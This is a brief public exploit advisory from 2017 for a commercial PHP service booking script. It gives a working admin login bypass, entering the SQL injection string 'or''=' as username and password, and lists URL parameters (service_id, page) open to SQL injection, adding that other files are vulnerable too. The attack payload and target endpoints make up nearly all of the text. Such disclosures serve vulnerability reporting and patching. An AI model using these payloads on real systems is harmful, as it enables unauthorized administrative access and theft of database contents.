16 lines
No EOL
681 B
Text
16 lines
No EOL
681 B
Text
# # # # #
|
|
# Vulnerability: Admin Login Bypass & SQLi
|
|
# Date: 13.01.2017
|
|
# Vendor Homepage: http://scriptfirm.com/
|
|
# Script Name: Professional Service Booking Script
|
|
# Script Buy Now: http://scriptfirm.com/professional-service-booking-engine
|
|
# Author: İhsan Şencan
|
|
# Author Web: http://ihsan.net
|
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
|
|
# http://localhost/[PATH]/content.php?page=[SQL]
|
|
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
|
|
# # # # # |